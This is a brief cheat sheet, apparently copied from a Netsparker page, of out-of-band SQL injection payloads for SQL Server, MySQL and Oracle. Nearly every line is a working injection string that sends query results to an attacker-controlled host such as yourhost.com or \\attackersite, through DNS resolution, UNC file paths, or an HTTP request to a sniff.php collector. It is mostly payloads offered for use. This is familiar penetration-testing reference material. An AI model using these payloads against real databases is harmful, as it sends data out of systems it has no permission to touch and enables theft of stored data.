Some use cases for out of band SQL Injection
SQL Server
?vulnerableParam=1; SELECT * FROM OPENROWSET('SQLOLEDB', ({INJECTION})+'.yourhost.com';'sa';'pwd', 'SELECT 1')
Makes DNS resolution request to {INJECT}.yourhost.com
Bulk insert to look for OOB attacks for MS-SQL
BULK INSERT mytable FROM '\\attackersite'
MySQL
?vulnerableParam=-99 OR (SELECT LOAD_FILE(concat('\\\\',({INJECTION}), 'yourhost.com\\')))
Makes a NBNS query request/DNS resolution request to yourhost.com
Oracle
?vulnerableParam=(SELECT UTL_HTTP.REQUEST('http://yourhost.com/sniff.php?sniff='||({INJECTION})||'') FROM DUAL)
Sniffer application will save results
?vulnerableParam=(SELECT UTL_INADDR.get_host_addr(({INJECTION})||'.yourhost.com') FROM DUAL)
You need to sniff dns resolution requests to yourhost.com
source: https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/#OutOfBandChannelAttacks
Must be logged in to change this ID's contents